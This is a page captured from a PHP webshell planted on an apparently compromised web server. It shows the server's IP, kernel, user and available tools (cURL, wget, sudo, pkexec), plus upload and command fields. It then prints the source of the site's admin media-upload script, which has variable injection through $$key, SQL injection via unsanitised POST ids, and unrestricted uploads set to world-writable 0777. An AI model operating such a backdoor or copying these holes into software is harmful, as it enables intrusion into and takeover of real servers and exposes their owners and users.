403Webshell
Server IP : 103.234.187.230  /  Your IP : 216.73.216.216
Web Server : Apache
System : Linux lserver42043-ind.megavelocity.net 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
User : apache ( 48)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/rsdgroup/adminPanel/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /var/www/html/rsdgroup/adminPanel/write_media.php
<?php
include_once("session.php");
include_once("settings.php");
foreach ($_REQUEST as $key => $value) {
	$$key = $value;
}

$upload_image = $rows['file_upload'];
$target_path	= "../cat_images/media/pics/";
$prefix		= time();
$target_path = $target_path . basename($prefix . $_FILES['file_upload']['name']);

$fileName = 'image';

if($_REQUEST['mode'] == "Edit") {  
    
    //Select Query........    
    $Image_Data="select * from tblphoto where id = '" .$_POST['id']. "'"; 
    $query=  mysql_query($Image_Data); 
    $rows = mysql_fetch_assoc($query);
    $media = $rows['media'];
    $file_upload = $rows['file_upload'];

if ($_FILES[$fileName]["error"] == 0)
{
    $tmp_name = $_FILES[$fileName]["tmp_name"];
    $photoName = $_FILES[$fileName]["name"];
    $photoName = ereg_replace("[^A-Za-z0-9.]", "", $photoName);
    $photoNameArr = explode(".",$photoName);
    //echo "<pre>";print_r($photoNameArr);echo "</pre>";
    //echo count($photoNameArr)."<br>";
    $fileExt = strtolower($photoNameArr[count($photoNameArr)-1]);
    //echo $fileExt."<br>";
    unset($photoNameArr[count($photoNameArr)-1]);
    //echo "<pre>";print_r($photoNameArr);echo "</pre>";
    $photoNameWithoutExt = implode("_",$photoNameArr);
    //echo $photoNameWithoutExt."<br>";
    //$img1New = $photoNameWithoutExt.time().".".$fileExt;
    $img1New = $fileName.time().".".$fileExt;
    //echo $img1New."<br>";

    if($fileExt == "swf" || $fileExt == "flv" ){
            $img1New			=	$img1New;
            $image_path = @unlink("../cat_images/media/video/".$media);
            move_uploaded_file($tmp_name, "../cat_images/media/video/".$img1New.""); 
            $img =  $img1New ;
            $type = 'video';
    $sql_cu = mysql_query("update tblPhoto set media = '" . $img . "' where id = '" . $_POST['id'] . "'");
    }
    else{  $img =''; ?>
            <script>
            document.location="media_list.php?page=listmedia"
            </script>
    <?php }
}

   if ($_FILES['file_upload']['name'] != "")
   {
        $image_path = @unlink("../cat_images/media/pics/".$file_upload);
        if (move_uploaded_file($_FILES['file_upload']['tmp_name'], $target_path)) {
            chmod($target_path, 0777);
            $upload_image = basename($prefix . $_FILES['file_upload']['name']);
        }
        $sql_cd = mysql_query("update tblPhoto set file_upload = '" . $upload_image . "' where id = '" . $_POST['id'] . "'");
    } else {
        $upload_image = $rows['file_upload'];
    }
    
    
    //echo "<pre>";
//echo print_r($sql);die;
    
}
else{
    

if ($_FILES[$fileName]["error"] == 0) {
	$tmp_name = $_FILES[$fileName]["tmp_name"];
	$photoName = $_FILES[$fileName]["name"];
	$photoName = ereg_replace("[^A-Za-z0-9.]", "", $photoName);
	$photoNameArr = explode(".",$photoName);
	//echo "<pre>";print_r($photoNameArr);echo "</pre>";
	//echo count($photoNameArr)."<br>";
	$fileExt = strtolower($photoNameArr[count($photoNameArr)-1]);
	//echo $fileExt."<br>";
	unset($photoNameArr[count($photoNameArr)-1]);
	//echo "<pre>";print_r($photoNameArr);echo "</pre>";
	$photoNameWithoutExt = implode("_",$photoNameArr);
	//echo $photoNameWithoutExt."<br>";
	//$img1New = $photoNameWithoutExt.time().".".$fileExt;
	$img1New = $fileName.time().".".$fileExt;
	//echo $img1New."<br>";
      
	if($fileExt == "swf" || $fileExt == "flv" ){
		$img1New			=	$img1New;
		move_uploaded_file($tmp_name, "../cat_images/media/video/".$img1New.""); 
		$img =  $img1New ;
		$type = 'video';
	}
	else{  $img =''; ?>
		<script>
		document.location="media_list.php?page=listmedia"
		</script>
	<?php }
}

  if ($_FILES['file_upload']['name'] != "") {
        
        if (move_uploaded_file($_FILES['file_upload']['tmp_name'], $target_path)) {
            chmod($target_path, 0777);
            $upload_image = basename($prefix . $_FILES['file_upload']['name']);
        }
    } else {
        echo 'not done'; die;
        //$upload_image = $rows['file_upload'];
    }
    
   
    $sql = "INSERT INTO `tblPhoto` (`media`,`file_upload`,`type`, `isDeleted`, `createdOn`, `createdBy`) VALUES ('".$img."' , '".$upload_image."' , '".$type."', 'no', unix_timestamp(), 'admin')";
    //echo "<pre>";
//echo print_r($sql);die;
    $result=mysql_query($sql);
    
}
   
    
 ?>
	
<script>
document.location="media_list.php?page=listmedia"
</script>

Youez - 2016 - github.com/yon3zu
LinuXploit